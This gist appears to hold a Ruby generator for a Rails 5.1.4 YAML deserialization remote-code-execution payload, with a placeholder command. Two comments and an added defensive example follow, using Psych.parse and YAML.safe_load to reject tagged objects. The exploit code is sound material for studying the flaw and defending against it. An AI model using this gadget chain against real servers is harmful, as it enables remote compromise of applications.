Rails 5.1.4 YAML unsafe deserialization RCE payload
```ruby
require 'yaml'
require 'base64'
require 'erb'

class ActiveSupport
  class Deprecation
    def initialize()
      @silenced = true
    end

    class DeprecatedInstanceVariableProxy
      def initialize(instance, method)
        @instance = instance
        @method = method
        @deprecator = ActiveSupport::Deprecation.new
      end
    end
  end
end

code = <<-EOS
puts "pwned"
EOS

erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@lineno, 1337

depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "")

payload = <<-PAYLOAD
---
!ruby/object:Gem::Requirement
requirements:
  !ruby/object:Rack::Session::Abstract::SessionHash
    req: !ruby/object:Rack::Request
      env:
        "rack.session": !ruby/object:Rack::Session::Abstract::SessionHash
          id: 'hi from espr'
        HTTP_COOKIE: "a=#{payload}"
    store: !ruby/object:Rack::Session::Cookie
      coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
      key: a
      secrets: []
    exists: true
    loaded: false
PAYLOAD

puts payload
```
RicterZ commented Nov 21, 2017

A 0-day? I couldn't find any information about this security issue on Rails official website or Github.

niklasb (Owner) commented May 31, 2018

@RicterZ If you load untrusted YAML without safe mode you have a security issue regardless of this payload
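The thread ends on the point that the real problem is loading untrusted YAML without safe mode. The following is an added example, not part of the gist or of either comment, showing the defensive side in Ruby: `Psych.parse` is used to inspect which explicit tags a document carries without constructing any objects (handy for logging or rejecting input up front), and `YAML.safe_load` is shown rejecting a `!ruby/object:` tag with `Psych::DisallowedClass`. The two sample documents are constructed for this example, and `Example::Widget` is a hypothetical class name that does not need to exist.

```ruby
require 'yaml'

# Constructed sample documents (not from the gist). The tagged one names a
# hypothetical class, Example::Widget, which need not exist: safe_load rejects
# the tag before it ever resolves the constant.
TAGGED_DOC = <<~YAML
  ---
  !ruby/object:Example::Widget
  name: hello
YAML

PLAIN_DOC = <<~YAML
  ---
  name: example
  count: 3
YAML

# Walk the parse tree without constructing any Ruby objects and collect the
# explicit tags present. Psych.parse only builds Psych::Nodes, so this can be
# run on untrusted input to log or reject documents carrying !ruby/... tags.
def tags_in(doc)
  tree = Psych.parse(doc)
  return [] unless tree
  tree.each.map { |node| node.respond_to?(:tag) ? node.tag : nil }.compact.uniq
end

# safe_load only builds core types (strings, numbers, arrays, hashes, ...).
# A tag naming a class outside the permitted list raises
# Psych::DisallowedClass instead of instantiating it.
def load_safely(doc)
  YAML.safe_load(doc)
end

# Report the rejection as a boolean rather than letting the exception escape.
def safe_load_rejects?(doc)
  load_safely(doc)
  false
rescue Psych::DisallowedClass
  true
end

if __FILE__ == $PROGRAM_NAME
  puts "tags in tagged doc:  #{tags_in(TAGGED_DOC).inspect}"
  puts "tags in plain doc:   #{tags_in(PLAIN_DOC).inspect}"
  puts "plain doc loads to:  #{load_safely(PLAIN_DOC).inspect}"
  puts "tagged doc rejected: #{safe_load_rejects?(TAGGED_DOC)}"
end
```

Note that the behaviour of plain `YAML.load` depends on the Psych version: from Psych 4 (Ruby 3.1) it delegates to `safe_load` and the unsafe behaviour moved to `YAML.unsafe_load`, while the Psych 3 shipped with Rails 5.1-era Ruby instantiated any tagged class, which is the precondition the gist relies on. Calling `safe_load` explicitly gives the same result on both.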
